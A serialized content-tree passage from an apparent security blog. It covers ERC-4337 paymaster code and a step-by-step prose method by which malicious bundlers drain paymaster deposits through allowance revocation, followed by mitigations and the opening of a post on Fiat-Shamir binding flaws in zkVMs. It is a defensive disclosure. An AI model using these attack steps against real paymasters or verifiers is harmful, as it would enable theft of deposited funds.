ctx.executionGasLimit\n",{"type":28,"tag":116,"props":106685,"children":106686},{"class":245,"line":796},[106687],{"type":28,"tag":116,"props":106688,"children":106689},{"style":266},[106690],{"type":33,"value":7415},{"type":28,"tag":116,"props":106692,"children":106693},{"class":245,"line":847},[106694],{"type":28,"tag":116,"props":106695,"children":106696},{"emptyLinePlaceholder":19},[106697],{"type":33,"value":1044},{"type":28,"tag":116,"props":106699,"children":106700},{"class":245,"line":898},[106701,106705,106709,106713,106718,106722],{"type":28,"tag":116,"props":106702,"children":106703},{"style":339},[106704],{"type":33,"value":89627},{"type":28,"tag":116,"props":106706,"children":106707},{"style":266},[106708],{"type":33,"value":103720},{"type":28,"tag":116,"props":106710,"children":106711},{"style":370},[106712],{"type":33,"value":373},{"type":28,"tag":116,"props":106714,"children":106715},{"style":266},[106716],{"type":33,"value":106717}," _actualGasCost ",{"type":28,"tag":116,"props":106719,"children":106720},{"style":370},[106721],{"type":33,"value":2268},{"type":28,"tag":116,"props":106723,"children":106724},{"style":266},[106725],{"type":33,"value":106726}," expectedPenaltyGasCost;\n",{"type":28,"tag":116,"props":106728,"children":106729},{"class":245,"line":907},[106730],{"type":28,"tag":116,"props":106731,"children":106732},{"emptyLinePlaceholder":19},[106733],{"type":33,"value":1044},{"type":28,"tag":116,"props":106735,"children":106736},{"class":245,"line":981},[106737,106741,106746],{"type":28,"tag":116,"props":106738,"children":106739},{"style":339},[106740],{"type":33,"value":89627},{"type":28,"tag":116,"props":106742,"children":106743},{"style":266},[106744],{"type":33,"value":106745}," costInToken ",{"type":28,"tag":116,"props":106747,"children":106748},{"style":370},[106749],{"type":33,"value":14359},{"type":28,"tag":116,"props":106751,"children":106752},{"class":245,"line":1011},[106753,106758,106763,106767],{"type":28,"tag":116,"props":106754,"children":106755},{"style":282},[106756],{"type":33,"value":106757},"            getCostInToken",{"type":28,"tag":116,"props":106759,"children":106760},{"style":266},[106761],{"type":33,"value":106762},"(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) ",{"type":28,"tag":116,"props":106764,"children":106765},{"style":370},[106766],{"type":33,"value":2268},{"type":28,"tag":116,"props":106768,"children":106769},{"style":266},[106770],{"type":33,"value":106771}," ctx.constantFee;\n",{"type":28,"tag":116,"props":106773,"children":106774},{"class":245,"line":1029},[106775],{"type":28,"tag":116,"props":106776,"children":106777},{"emptyLinePlaceholder":19},[106778],{"type":33,"value":1044},{"type":28,"tag":116,"props":106780,"children":106781},{"class":245,"line":1038},[106782,106786,106791],{"type":28,"tag":116,"props":106783,"children":106784},{"style":339},[106785],{"type":33,"value":89627},{"type":28,"tag":116,"props":106787,"children":106788},{"style":266},[106789],{"type":33,"value":106790}," absoluteCostInToken ",{"type":28,"tag":116,"props":106792,"children":106793},{"style":370},[106794],{"type":33,"value":14359},{"type":28,"tag":116,"props":106796,"children":106797},{"class":245,"line":1047},[106798,106803,106807,106812,106816,106820,106824,106828,106832,106836,106840],{"type":28,"tag":116,"props":106799,"children":106800},{"style":266},[106801],{"type":33,"value":106802},"            costInToken ",{"type":28,"tag":116,"props":106804,"children":106805},{"style":370},[106806],{"type":33,"value":645},{"type":28,"tag":116,"props":106808,"children":106809},{"style":266},[106810],{"type":33,"value":106811}," ctx.preFundCharged ",{"type":28,"tag":116,"props":106813,"children":106814},{"style":370},[106815],{"type":33,"value":2825},{"type":28,"tag":116,"props":106817,"children":106818},{"style":266},[106819],{"type":33,"value":106745},{"type":28,"tag":116,"props":106821,"children":106822},{"style":370},[106823],{"type":33,"value":3996},{"type":28,"tag":116,"props":106825,"children":106826},{"style":266},[106827],{"type":33,"value":106811},{"type":28,"tag":116,"props":106829,"children":106830},{"style":370},[106831],{"type":33,"value":4160},{"type":28,"tag":116,"props":106833,"children":106834},{"style":266},[106835],{"type":33,"value":106811},{"type":28,"tag":116,"props":106837,"children":106838},{"style":370},[106839],{"type":33,"value":3996},{"type":28,"tag":116,"props":106841,"children":106842},{"style":266},[106843],{"type":33,"value":106844}," costInToken;\n",{"type":28,"tag":116,"props":106846,"children":106847},{"class":245,"line":1071},[106848],{"type":28,"tag":116,"props":106849,"children":106850},{"emptyLinePlaceholder":19},[106851],{"type":33,"value":1044},{"type":28,"tag":116,"props":106853,"children":106854},{"class":245,"line":1137},[106855,106860,106864],{"type":28,"tag":116,"props":106856,"children":106857},{"style":266},[106858],{"type":33,"value":106859},"        SafeTransferLib.",{"type":28,"tag":116,"props":106861,"children":106862},{"style":282},[106863],{"type":33,"value":103251},{"type":28,"tag":116,"props":106865,"children":106866},{"style":266},[106867],{"type":33,"value":3133},{"type":28,"tag":116,"props":106869,"children":106870},{"class":245,"line":1181},[106871],{"type":28,"tag":116,"props":106872,"children":106873},{"style":266},[106874],{"type":33,"value":106875},"            ctx.token,\n",{"type":28,"tag":116,"props":106877,"children":106878},{"class":245,"line":1212},[106879,106883,106887,106891,106895,106900,106904],{"type":28,"tag":116,"props":106880,"children":106881},{"style":266},[106882],{"type":33,"value":106802},{"type":28,"tag":116,"props":106884,"children":106885},{"style":370},[106886],{"type":33,"value":645},{"type":28,"tag":116,"props":106888,"children":106889},{"style":266},[106890],{"type":33,"value":106811},{"type":28,"tag":116,"props":106892,"children":106893},{"style":370},[106894],{"type":33,"value":2825},{"type":28,"tag":116,"props":106896,"children":106897},{"style":266},[106898],{"type":33,"value":106899}," ctx.sender ",{"type":28,"tag":116,"props":106901,"children":106902},{"style":370},[106903],{"type":33,"value":4160},{"type":28,"tag":116,"props":106905,"children":106906},{"style":266},[106907],{"type":33,"value":106908}," ctx.treasury,\n",{"type":28,"tag":116,"props":106910,"children":106911},{"class":245,"line":1254},[106912,106916,106920,106924,106928,106933,106937],{"type":28,"tag":116,"props":106913,"children":106914},{"style":266},[106915],{"type":33,"value":106802},{"type":28,"tag":116,"props":106917,"children":106918},{"style":370},[106919],{"type":33,"value":645},{"type":28,"tag":116,"props":106921,"children":106922},{"style":266},[106923],{"type":33,"value":106811},{"type":28,"tag":116,"props":106925,"children":106926},{"style":370},[106927],{"type":33,"value":2825},{"type":28,"tag":116,"props":106929,"children":106930},{"style":266},[106931],{"type":33,"value":106932}," ctx.treasury ",{"type":28,"tag":116,"props":106934,"children":106935},{"style":370},[106936],{"type":33,"value":4160},{"type":28,"tag":116,"props":106938,"children":106939},{"style":266},[106940],{"type":33,"value":106941}," ctx.sender,\n",{"type":28,"tag":116,"props":106943,"children":106944},{"class":245,"line":1262},[106945],{"type":28,"tag":116,"props":106946,"children":106947},{"style":266},[106948],{"type":33,"value":106949},"            absoluteCostInToken\n",{"type":28,"tag":116,"props":106951,"children":106952},{"class":245,"line":1294},[106953],{"type":28,"tag":116,"props":106954,"children":106955},{"style":266},[106956],{"type":33,"value":7415},{"type":28,"tag":116,"props":106958,"children":106959},{"class":245,"line":1334},[106960],{"type":28,"tag":116,"props":106961,"children":106962},{"emptyLinePlaceholder":19},[106963],{"type":33,"value":1044},{"type":28,"tag":116,"props":106965,"children":106966},{"class":245,"line":1372},[106967,106971,106976,106980,106985,106989,106994,106998,107003],{"type":28,"tag":116,"props":106968,"children":106969},{"style":339},[106970],{"type":33,"value":89627},{"type":28,"tag":116,"props":106972,"children":106973},{"style":266},[106974],{"type":33,"value":106975}," preFundInToken ",{"type":28,"tag":116,"props":106977,"children":106978},{"style":370},[106979],{"type":33,"value":373},{"type":28,"tag":116,"props":106981,"children":106982},{"style":266},[106983],{"type":33,"value":106984}," (ctx.preFund ",{"type":28,"tag":116,"props":106986,"children":106987},{"style":370},[106988],{"type":33,"value":4240},{"type":28,"tag":116,"props":106990,"children":106991},{"style":266},[106992],{"type":33,"value":106993}," ctx.exchangeRate) ",{"type":28,"tag":116,"props":106995,"children":106996},{"style":370},[106997],{"type":33,"value":4250},{"type":28,"tag":116,"props":106999,"children":107000},{"style":350},[107001],{"type":33,"value":107002}," 1e18",{"type":28,"tag":116,"props":107004,"children":107005},{"style":266},[107006],{"type":33,"value":384},{"type":28,"tag":116,"props":107008,"children":107009},{"class":245,"line":1381},[107010],{"type":28,"tag":116,"props":107011,"children":107012},{"emptyLinePlaceholder":19},[107013],{"type":33,"value":1044},{"type":28,"tag":116,"props":107015,"children":107016},{"class":245,"line":1389},[107017,107021,107026,107030,107034,107038,107042,107046,107050,107054,107058],{"type":28,"tag":116,"props":107018,"children":107019},{"style":260},[107020],{"type":33,"value":2943},{"type":28,"tag":116,"props":107022,"children":107023},{"style":266},[107024],{"type":33,"value":107025}," (ctx.recipient ",{"type":28,"tag":116,"props":107027,"children":107028},{"style":370},[107029],{"type":33,"value":15350},{"type":28,"tag":116,"props":107031,"children":107032},{"style":339},[107033],{"type":33,"value":5921},{"type":28,"tag":116,"props":107035,"children":107036},{"style":266},[107037],{"type":33,"value":313},{"type":28,"tag":116,"props":107039,"children":107040},{"style":350},[107041],{"type":33,"value":353},{"type":28,"tag":116,"props":107043,"children":107044},{"style":266},[107045],{"type":33,"value":1609},{"type":28,"tag":116,"props":107047,"children":107048},{"style":370},[107049],{"type":33,"value":72815},{"type":28,"tag":116,"props":107051,"children":107052},{"style":266},[107053],{"type":33,"value":106975},{"type":28,"tag":116,"props":107055,"children":107056},{"style":370},[107057],{"type":33,"value":645},{"type":28,"tag":116,"props":107059,"children":107060},{"style":266},[107061],{"type":33,"value":107062}," costInToken) {\n",{"type":28,"tag":116,"props":107064,"children":107065},{"class":245,"line":1425},[107066,107071,107075,107080,107084],{"type":28,"tag":116,"props":107067,"children":107068},{"style":266},[107069],{"type":33,"value":107070},"            SafeTransferLib.",{"type":28,"tag":116,"props":107072,"children":107073},{"style":282},[107074],{"type":33,"value":103251},{"type":28,"tag":116,"props":107076,"children":107077},{"style":266},[107078],{"type":33,"value":107079},"(ctx.token, ctx.sender, ctx.recipient, preFundInToken ",{"type":28,"tag":116,"props":107081,"children":107082},{"style":370},[107083],{"type":33,"value":3996},{"type":28,"tag":116,"props":107085,"children":107086},{"style":266},[107087],{"type":33,"value":107088}," costInToken);\n",{"type":28,"tag":116,"props":107090,"children":107091},{"class":245,"line":1448},[107092],{"type":28,"tag":116,"props":107093,"children":107094},{"style":266},[107095],{"type":33,"value":1954},{"type":28,"tag":116,"props":107097,"children":107098},{"class":245,"line":1456},[107099],{"type":28,"tag":116,"props":107100,"children":107101},{"emptyLinePlaceholder":19},[107102],{"type":33,"value":1044},{"type":28,"tag":116,"props":107104,"children":107105},{"class":245,"line":1520},[107106,107111,107115],{"type":28,"tag":116,"props":107107,"children":107108},{"style":260},[107109],{"type":33,"value":107110},"        emit",{"type":28,"tag":116,"props":107112,"children":107113},{"style":282},[107114],{"type":33,"value":103985},{"type":28,"tag":116,"props":107116,"children":107117},{"style":266},[107118],{"type":33,"value":107119},"(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n",{"type":28,"tag":116,"props":107121,"children":107122},{"class":245,"line":1580},[107123],{"type":28,"tag":116,"props":107124,"children":107125},{"style":266},[107126],{"type":33,"value":3025},{"type":28,"tag":29,"props":107128,"children":107129},{},[107130,107132,107137,107139,107145,107147,107153,107155,107160,107162,107167],{"type":33,"value":107131},"As shown above, the paymaster calculates the actual gas used and attempts to charge the user by calling ",{"type":28,"tag":98,"props":107133,"children":107135},{"className":107134},[],[107136],{"type":33,"value":103251},{"type":33,"value":107138},". Note that ",{"type":28,"tag":98,"props":107140,"children":107142},{"className":107141},[],[107143],{"type":33,"value":107144},"preFundCharged",{"type":33,"value":107146}," can be zero, as users can opt out of any ",{"type":28,"tag":98,"props":107148,"children":107150},{"className":107149},[],[107151],{"type":33,"value":107152},"preFund",{"type":33,"value":107154}," during the validation phase. If the user hasn't given sufficient allowance to Pimlico's paymaster for the transfer, the ",{"type":28,"tag":98,"props":107156,"children":107158},{"className":107157},[],[107159],{"type":33,"value":104052},{"type":33,"value":107161}," call inside ",{"type":28,"tag":98,"props":107163,"children":107165},{"className":107164},[],[107166],{"type":33,"value":105136},{"type":33,"value":107168}," will revert and the paymaster won't be able to collect payment from the user.",{"type":28,"tag":29,"props":107170,"children":107171},{},[107172,107174,107179,107181,107187,107189,107195],{"type":33,"value":107173},"However, even when ",{"type":28,"tag":98,"props":107175,"children":107177},{"className":107176},[],[107178],{"type":33,"value":104052},{"type":33,"value":107180}," fails, the EntryPoint will still complete the execution and pay the bundler who submitted it. Importantly, this payment comes from the paymaster's deposit, since during validation the ",{"type":28,"tag":98,"props":107182,"children":107184},{"className":107183},[],[107185],{"type":33,"value":107186},"requiredPrefund",{"type":33,"value":107188}," was taken from the paymaster's ",{"type":28,"tag":87,"props":107190,"children":107193},{"href":107191,"rel":107192},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L625-L627",[91],[107194],{"type":33,"value":61582},{"type":33,"value":141},{"type":28,"tag":29,"props":107197,"children":107198},{},[107199,107201,107206],{"type":33,"value":107200},"This creates a critical vulnerability for paymasters that implement post-execution charging patterns. Even if the ",{"type":28,"tag":98,"props":107202,"children":107204},{"className":107203},[],[107205],{"type":33,"value":104052},{"type":33,"value":107207}," call fails (meaning the paymaster couldn't collect payment from the user), the paymaster still has to pay the bundler's gas costs from their deposited funds. This vulnerability can be exploited by malicious bundlers in the following way:",{"type":28,"tag":455,"props":107209,"children":107210},{},[107211,107229,107248,107259,107264],{"type":28,"tag":459,"props":107212,"children":107213},{},[107214,107216,107221,107223],{"type":33,"value":107215},"The bundler creates a ",{"type":28,"tag":98,"props":107217,"children":107219},{"className":107218},[],[107220],{"type":33,"value":101796},{"type":33,"value":107222}," with an intentionally high ",{"type":28,"tag":98,"props":107224,"children":107226},{"className":107225},[],[107227],{"type":33,"value":107228},"gasPrice",{"type":28,"tag":459,"props":107230,"children":107231},{},[107232,107234,107239,107241,107246],{"type":33,"value":107233},"The bundler ensures the ",{"type":28,"tag":98,"props":107235,"children":107237},{"className":107236},[],[107238],{"type":33,"value":104052},{"type":33,"value":107240}," call will fail by revoking the paymaster's token allowance before ",{"type":28,"tag":98,"props":107242,"children":107244},{"className":107243},[],[107245],{"type":33,"value":104052},{"type":33,"value":107247}," executes",{"type":28,"tag":459,"props":107249,"children":107250},{},[107251,107252,107257],{"type":33,"value":62974},{"type":28,"tag":98,"props":107253,"children":107255},{"className":107254},[],[107256],{"type":33,"value":104052},{"type":33,"value":107258}," fails, the bundler still gets paid their high gas costs by the paymaster",{"type":28,"tag":459,"props":107260,"children":107261},{},[107262],{"type":33,"value":107263},"The paymaster loses money since they paid the bundler but couldn't collect from the user",{"type":28,"tag":459,"props":107265,"children":107266},{},[107267],{"type":33,"value":107268},"The bundler profits as long as their actual gas costs are less than what they charged",{"type":28,"tag":29,"props":107270,"children":107271},{},[107272,107274,107279,107281,107286],{"type":33,"value":107273},"This effectively allows bundlers to drain paymaster deposits by submitting ",{"type":28,"tag":98,"props":107275,"children":107277},{"className":107276},[],[107278],{"type":33,"value":101825},{"type":33,"value":107280}," designed to fail during ",{"type":28,"tag":98,"props":107282,"children":107284},{"className":107283},[],[107285],{"type":33,"value":104052},{"type":33,"value":107287}," while maximizing the gas costs they can charge to the paymaster.",{"type":28,"tag":29,"props":107289,"children":107290},{},[107291,107293,107298,107300,107305,107307,107313,107315,107320],{"type":33,"value":107292},"Some paymasters try to protect against this by simulating the ",{"type":28,"tag":98,"props":107294,"children":107296},{"className":107295},[],[107297],{"type":33,"value":101796},{"type":33,"value":107299}," execution before signing and allowing it to be submitted. However, this protection can be easily bypassed because an attacker can simply approve the required token allowance during simulation to pass validation, but then revoke the allowance just before the ",{"type":28,"tag":98,"props":107301,"children":107303},{"className":107302},[],[107304],{"type":33,"value":101796},{"type":33,"value":107306}," is submitted via ",{"type":28,"tag":98,"props":107308,"children":107310},{"className":107309},[],[107311],{"type":33,"value":107312},"handleOps",{"type":33,"value":107314},". This means the ",{"type":28,"tag":98,"props":107316,"children":107318},{"className":107317},[],[107319],{"type":33,"value":104052},{"type":33,"value":107321}," will pass simulation but fail during actual execution, allowing the bundler to drain the paymaster's deposit from the EntryPoint.",{"type":28,"tag":29,"props":107323,"children":107324},{},[107325],{"type":33,"value":107326},"To protect against this vulnerability, paymasters should implement pre-execution charging patterns rather than post-execution charging. This means requiring users to pre-fund the full estimated gas cost during the validation phase, before the operation executes. By collecting payment upfront, the paymaster is protected against failed post-execution transfers that could be exploited by malicious bundlers.",{"type":28,"tag":29,"props":107328,"children":107329},{},[107330],{"type":33,"value":107331},"If post-execution charging is absolutely necessary for UX reasons, paymasters have several mitigation strategies available. One approach is to restrict usage to a whitelist of trusted bundlers, though this introduces centralization concerns. Alternatively, Pimlico tries to address this issue by tightening API limits and constraining ERC-20 usage for its users.",{"type":28,"tag":29,"props":107333,"children":107334},{},[107335],{"type":33,"value":107336},"The most secure approach is to require upfront pre-funding, even though it may temporarily lock more user funds. This small UX tradeoff is worth the strong security guarantees it provides against paymaster exploitation.",{"type":28,"tag":41,"props":107338,"children":107339},{"id":2506},[107340],{"type":33,"value":2509},{"type":28,"tag":29,"props":107342,"children":107343},{},[107344],{"type":33,"value":107345},"ERC-4337 paymasters enable powerful new UX patterns by abstracting away gas costs from end users. However, implementing them securely requires careful consideration of the standard's execution flow and potential attack vectors. The key lessons are:",{"type":28,"tag":455,"props":107347,"children":107348},{},[107349,107354,107359,107364,107369],{"type":28,"tag":459,"props":107350,"children":107351},{},[107352],{"type":33,"value":107353},"Always collect full payment during validation, not after execution",{"type":28,"tag":459,"props":107355,"children":107356},{},[107357],{"type":33,"value":107358},"Be conservative with gas estimations and include safety margins",{"type":28,"tag":459,"props":107360,"children":107361},{},[107362],{"type":33,"value":107363},"Carefully validate all user inputs and token transfers",{"type":28,"tag":459,"props":107365,"children":107366},{},[107367],{"type":33,"value":107368},"Test extensively, including simulation of malicious behavior",{"type":28,"tag":459,"props":107370,"children":107371},{},[107372,107374,107379],{"type":33,"value":107373},"Always review changes in new ",{"type":28,"tag":98,"props":107375,"children":107377},{"className":107376},[],[107378],{"type":33,"value":101877},{"type":33,"value":107380}," versions, as they may impact your paymaster's design and security assumptions",{"type":28,"tag":29,"props":107382,"children":107383},{},[107384,107386,107391,107393,107398,107400,107405],{"type":33,"value":107385},"The last point is particularly important as the ERC-4337 standard continues to evolve. Changes to the ",{"type":28,"tag":98,"props":107387,"children":107389},{"className":107388},[],[107390],{"type":33,"value":101877},{"type":33,"value":107392}," contract's behavior could potentially break existing ",{"type":28,"tag":98,"props":107394,"children":107396},{"className":107395},[],[107397],{"type":33,"value":101949},{"type":33,"value":107399}," implementations or introduce new security considerations. Developers should thoroughly review release notes and diffs when upgrading to new ",{"type":28,"tag":98,"props":107401,"children":107403},{"className":107402},[],[107404],{"type":33,"value":101877},{"type":33,"value":107406}," versions.",{"type":28,"tag":29,"props":107408,"children":107409},{},[107410],{"type":33,"value":107411},"By following these best practices, developers can build robust paymasters that enhance UX while protecting against exploitation. As the ERC-4337 ecosystem matures, secure paymaster implementations will be crucial for driving mainstream adoption of account abstraction.",{"type":28,"tag":29,"props":107413,"children":107414},{},[107415],{"type":33,"value":107416},"If you're building a paymaster and want to ensure it's secure against these and other vulnerabilities, consider getting an audit from us. Our team has extensive experience auditing ERC-4337 implementations and can help identify potential security issues before they impact production.",{"type":28,"tag":2516,"props":107418,"children":107419},{},[107420],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":107422},[107423,107424,107425,107432,107437,107438],{"id":101711,"depth":256,"text":101714},{"id":101727,"depth":256,"text":101730},{"id":101766,"depth":256,"text":101769,"children":107426},[107427,107428,107429,107430,107431],{"id":101789,"depth":293,"text":101796},{"id":101830,"depth":293,"text":101833},{"id":101856,"depth":293,"text":101859},{"id":14389,"depth":293,"text":101877},{"id":101949,"depth":293,"text":101960},{"id":102012,"depth":256,"text":107433,"children":107434},"Understanding the EntryPoint's Flow",[107435,107436],{"id":102068,"depth":293,"text":102071},{"id":102253,"depth":293,"text":102256},{"id":102496,"depth":256,"text":102502},{"id":104095,"depth":256,"text":104101,"children":107439},[107440,107441],{"id":104155,"depth":293,"text":104158},{"id":104215,"depth":293,"text":104218},"content:blog:2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm",{"_path":107446,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":107447,"description":107448,"date":107449,"author":107450,"image":107453,"isFeatured":19,"onBlogPage":19,"tags":107455,"body":107457,"_type":2534,"_id":123262,"_source":2536,"_file":123263,"_stem":123264,"_extension":2539},"/blog/2026-03-03-zkvms-unfaithful-claims","Unfaithful Claims: Breaking 6 zkVMs","A zkVM verifier should be faithful to one thing above all else: its public claims. Yet we found six systems where this guarantee breaks. Learn how a subtle ordering bug lets an attacker bypass the cryptography entirely and prove mathematically impossible statements.","2026-03-03T12:00:00.000Z",[107451,107452],"himanshu","valter",{"src":107454,"width":17,"height":18},"/posts/zkvms-unfaithful-claims/title.png",[107456],"zkVM",{"type":25,"children":107458,"toc":123226},[107459,107464,107506,107519,107522,107528,107533,107661,107664,107670,107676,107681,107713,107861,107866,107989,108000,108011,108034,108045,108050,108083,108091,108096,108099,108105,108110,108116,108121,108126,108134,108152,108293,108298,108304,108397,109131,109199,109210,109218,109692,109698,110137,110477,110630,110635,111523,111679,111685,111777,111782,112367,112817,112893,112899,112904,112973,112983,112999,113009,113070,113489,113521,113531,113706,113711,113721,114321,114509,114527,114530,114536,114541,114549,114581,114943,114948,115033,115036,115042,115050,115055,115058,115064,115069,115077,115085,115093,115101,115134,115142,115150,115241,115492,115819,115827,115857,116027,116353,116358,116363,116380,116383,116388,116393,116405,116417,117008,117020,117032,117039,117047,117059,117067,117082,117087,117367,117386,117481,117500,117516,117519,117525,117530,117535,117542,117550,117557,117565,117578,117596,118056,118158,118163,118168,118184,118187,118193,118198,118210,118221,118226,118616,118623,118631,118656,118676,118932,118943,118962,119346,119692,119922,120081,120241,120809,120814,120840,120843,120849,120854,120861,120869,120882,120954,120965,120973,120983,120991,121002,121276,121365,121394,121397,121402,121536,121548,121555,121560,121713,121739,121746,121754,121759,121825,121830,122220,122307,122323,122326,122332,122337,122343,122443,122502,122507,122513,122518,122526,122531,122537,122542,122547,122553,122558,122561,122567,122573,122578,122583,122588,122593,122598,122601,122607,122770,122775,122778,122783,122794,123111,123116,123140,123145,123163,123168,123171,123177,123182,123187,123197,123202,123212,123222],{"type":28,"tag":29,"props":107460,"children":107461},{},[107462],{"type":33,"value":107463},"A zkVM verifier should be faithful to one thing above all else: its public claims. If the claimed input/output statement is false, verification must fail.",{"type":28,"tag":29,"props":107465,"children":107466},{},[107467,107469,107474,107475,107480,107481,107486,107487,107492,107493,107498,107499,107504],{"type":33,"value":107468},"We found six systems where this faithfulness breaks. Across ",{"type":28,"tag":4995,"props":107470,"children":107471},{},[107472],{"type":33,"value":107473},"Jolt",{"type":33,"value":825},{"type":28,"tag":4995,"props":107476,"children":107477},{},[107478],{"type":33,"value":107479},"Nexus",{"type":33,"value":825},{"type":28,"tag":4995,"props":107482,"children":107483},{},[107484],{"type":33,"value":107485},"Cairo-M",{"type":33,"value":825},{"type":28,"tag":4995,"props":107488,"children":107489},{},[107490],{"type":33,"value":107491},"Ceno",{"type":33,"value":825},{"type":28,"tag":4995,"props":107494,"children":107495},{},[107496],{"type":33,"value":107497},"Expander",{"type":33,"value":6159},{"type":28,"tag":4995,"props":107500,"children":107501},{},[107502],{"type":33,"value":107503},"Binius64",{"type":33,"value":107505},", public-claim data was not always bound into Fiat-Shamir transcripts before challenge generation. That subtle ordering bug turns statement values into attacker-controlled variables in later verification equations.",{"type":28,"tag":29,"props":107507,"children":107508},{},[107509,107511,107517],{"type":33,"value":107510},"In this post, we demonstrate how to exploit these unbound variables to bypass the cryptography entirely and prove mathematically impossible statements, such as finding a counterexample to Fermat's Last Theorem (see ",{"type":28,"tag":87,"props":107512,"children":107514},{"href":107513},"#challenges",[107515],{"type":33,"value":107516},"Challenges",{"type":33,"value":107518}," to try this out yourself). In a blockchain context, this could translate to receiving $1M out of thin air.",{"type":28,"tag":18457,"props":107520,"children":107521},{},[],{"type":28,"tag":63,"props":107523,"children":107525},{"id":107524},"jargon-cheat-sheet",[107526],{"type":33,"value":107527},"Jargon Cheat Sheet",{"type":28,"tag":29,"props":107529,"children":107530},{},[107531],{"type":33,"value":107532},"Before we go deeper, here's a one-liner for every term you'll encounter. The ZK ecosystem is particularly full of jargon and abbreviations, which may be off-putting to newcomers. Bookmark this section.",{"type":28,"tag":2108,"props":107534,"children":107535},{},[107536,107546,107556,107566,107576,107586,107596,107606,107616,107626,107636,107646],{"type":28,"tag":459,"props":107537,"children":107538},{},[107539,107544],{"type":28,"tag":4995,"props":107540,"children":107541},{},[107542],{"type":33,"value":107543},"Fiat-Shamir",{"type":33,"value":107545},": Instead of a real verifier sending random challenges, hash everything so far to get \"random\" challenges. Makes proofs non-interactive.",{"type":28,"tag":459,"props":107547,"children":107548},{},[107549,107554],{"type":28,"tag":4995,"props":107550,"children":107551},{},[107552],{"type":33,"value":107553},"Transcript",{"type":33,"value":107555},": The running hash state. You \"absorb\" data into it, then \"squeeze\" out challenges.",{"type":28,"tag":459,"props":107557,"children":107558},{},[107559,107564],{"type":28,"tag":4995,"props":107560,"children":107561},{},[107562],{"type":33,"value":107563},"Polynomial Commitment",{"type":33,"value":107565},": Like a hash, but for polynomials. You commit to a polynomial, then later prove \"my polynomial evaluates to 42 at point 7\" without revealing the whole polynomial.",{"type":28,"tag":459,"props":107567,"children":107568},{},[107569,107574],{"type":28,"tag":4995,"props":107570,"children":107571},{},[107572],{"type":33,"value":107573},"Sumcheck",{"type":33,"value":107575},": A protocol to prove \"this polynomial sums to H over all boolean inputs\" without actually computing the exponentially many terms. Reduces to checking one random point.",{"type":28,"tag":459,"props":107577,"children":107578},{},[107579,107584],{"type":28,"tag":4995,"props":107580,"children":107581},{},[107582],{"type":33,"value":107583},"MLE (Multilinear Extension)",{"type":33,"value":107585},": Turn a table of values into a polynomial. The polynomial equals the table on 0/1 inputs and smoothly interpolates elsewhere. Key property: evaluating it is a linear function of the table entries.",{"type":28,"tag":459,"props":107587,"children":107588},{},[107589,107594],{"type":28,"tag":4995,"props":107590,"children":107591},{},[107592],{"type":33,"value":107593},"Lookup / LogUp",{"type":33,"value":107595},": Prove \"all my values appear in this table\" by encoding membership as sums of fractions. If the sums match, the sets match (with high probability).",{"type":28,"tag":459,"props":107597,"children":107598},{},[107599,107604],{"type":28,"tag":4995,"props":107600,"children":107601},{},[107602],{"type":33,"value":107603},"AIR",{"type":33,"value":107605},": \"Algebraic Intermediate Representation\" - a way to write \"valid execution trace\" as polynomial equations. If the equations hold, the trace is valid.",{"type":28,"tag":459,"props":107607,"children":107608},{},[107609,107614],{"type":28,"tag":4995,"props":107610,"children":107611},{},[107612],{"type":33,"value":107613},"STARK",{"type":33,"value":107615},": Prove AIR constraints hold using commitments + random sampling + FRI. No trusted setup needed.",{"type":28,"tag":459,"props":107617,"children":107618},{},[107619,107624],{"type":28,"tag":4995,"props":107620,"children":107621},{},[107622],{"type":33,"value":107623},"FRI",{"type":33,"value":107625},": \"Fast Reed-Solomon IOP\" - proves a committed function is actually a low-degree polynomial, not arbitrary garbage that passes spot-checks.",{"type":28,"tag":459,"props":107627,"children":107628},{},[107629,107634],{"type":28,"tag":4995,"props":107630,"children":107631},{},[107632],{"type":33,"value":107633},"OODS",{"type":33,"value":107635},": \"Out-of-Domain Sampling\" - check the constraint polynomial at a random point outside the execution domain. Ties everything together.",{"type":28,"tag":459,"props":107637,"children":107638},{},[107639,107644],{"type":28,"tag":4995,"props":107640,"children":107641},{},[107642],{"type":33,"value":107643},"GKR",{"type":33,"value":107645},": Verify arithmetic circuits layer-by-layer using sumcheck. Reduces \"check this huge circuit\" to \"check a few random evaluations.\"",{"type":28,"tag":459,"props":107647,"children":107648},{},[107649,107654,107656],{"type":28,"tag":4995,"props":107650,"children":107651},{},[107652],{"type":33,"value":107653},"claimed_sum / opening_claim",{"type":33,"value":107655},": Prover-supplied values that feed into verification equations. ",{"type":28,"tag":4995,"props":107657,"children":107658},{},[107659],{"type":33,"value":107660},"These are the usual suspects for binding bugs.",{"type":28,"tag":18457,"props":107662,"children":107663},{},[],{"type":28,"tag":63,"props":107665,"children":107667},{"id":107666},"what-are-we-even-breaking",[107668],{"type":33,"value":107669},"What Are We Even Breaking?",{"type":28,"tag":75,"props":107671,"children":107673},{"id":107672},"what-is-a-zkvm",[107674],{"type":33,"value":107675},"What is a zkVM?",{"type":28,"tag":29,"props":107677,"children":107678},{},[107679],{"type":33,"value":107680},"A zkVM proof claims that a program executed correctly on public inputs, producing the claimed public output, while hiding the full execution trace.",{"type":28,"tag":29,"props":107682,"children":107683},{},[107684,107686,107711],{"type":33,"value":107685},"Formally, the verifier is convinced that there exists a valid trace ",{"type":28,"tag":98,"props":107687,"children":107689},{"className":107688},[3652,3653],[107690],{"type":28,"tag":116,"props":107691,"children":107693},{"className":107692},[3658],[107694],{"type":28,"tag":116,"props":107695,"children":107697},{"className":107696,"ariaHidden":3664},[3663],[107698],{"type":28,"tag":116,"props":107699,"children":107701},{"className":107700},[3669],[107702,107706],{"type":28,"tag":116,"props":107703,"children":107705},{"className":107704,"style":21246},[3674],[],{"type":28,"tag":116,"props":107707,"children":107709},{"className":107708,"style":21252},[3680,21251],[107710],{"type":33,"value":5659},{"type":33,"value":107712}," such 